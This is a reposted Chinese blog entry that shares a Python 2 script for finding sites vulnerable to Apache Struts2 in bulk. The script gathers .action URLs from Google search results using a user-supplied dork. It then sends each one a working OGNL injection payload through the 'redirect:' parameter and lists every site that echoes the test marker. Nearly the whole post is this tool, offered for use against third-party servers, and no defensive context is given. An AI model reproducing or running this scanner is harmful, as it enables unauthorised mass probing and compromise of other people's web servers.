您的位置:首页 > 编程语言 > Python开发

分享一段struts st2漏洞批量查找的Python代码

2020-02-01 04:28 1061 查看

来源:x55admin@freebuf

#! /usr/bin/env python
# -*-coding:cp936-*-
#  by: x55admin
# 用法:Key?: 关键字 inurl:.action?

import urllib2,urllib,threading,Queue,os
import msvcrt
import json
import sys
import re

seachstr = raw_input("Key?:")
pagenum = raw_input("How many?:")
pagenum = int(pagenum)/8+1
line = 1

class googlesearch(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.urls= []
def run(self):
while 1:
self.catchURL()
queue.task_done()
def catchURL(self):
self.key = seachstr.decode('gbk').encode('utf-8')
self.page= str(queue.get())
url = ('https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s') % (urllib.quote(self.key),self.page)
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request)
results = json.load(response)
URLinfo = results['responseData']['results']
except Exception,e:
print e
else:
for info in URLinfo:
try:
url_unre= info['url']
re_url=r'(http://.+action)'
url_re=re.findall(re_url,url_unre)
test_exp="?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}"
test_url= url_re[0]+test_exp
request = urllib2.Request(test_url)
response = urllib2.urlopen(request).read(8)

if "[/ok]" in response :
print url_re[0]
print '发现1个漏洞地址……'
else :
print "not need url……"
continue
except :
print "error……"

class ThreadGetKey(threading.Thread):
def run(self):
while 1:
try:
chr = msvcrt.getch()
if chr == 'q':
print "stopped by your action ( q )"
os._exit(1)
else:
continue
except:
os._exit(1)

if __name__ == '__main__':
pages=[]
queue = Queue.Queue()
for i in range(1,pagenum+1):
pages.append(i)
for n in pages:
queue.put(n)
ThreadGetKey().start()
for p in range(line):
googlesearch().start()
[/code]

转载于:https://my.oschina.net/chinahermit/blog/147009

  • 点赞
  • 收藏
  • 分享
  • 文章举报
chuancuili8770 发布了0 篇原创文章 · 获赞 0 · 访问量 1688 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: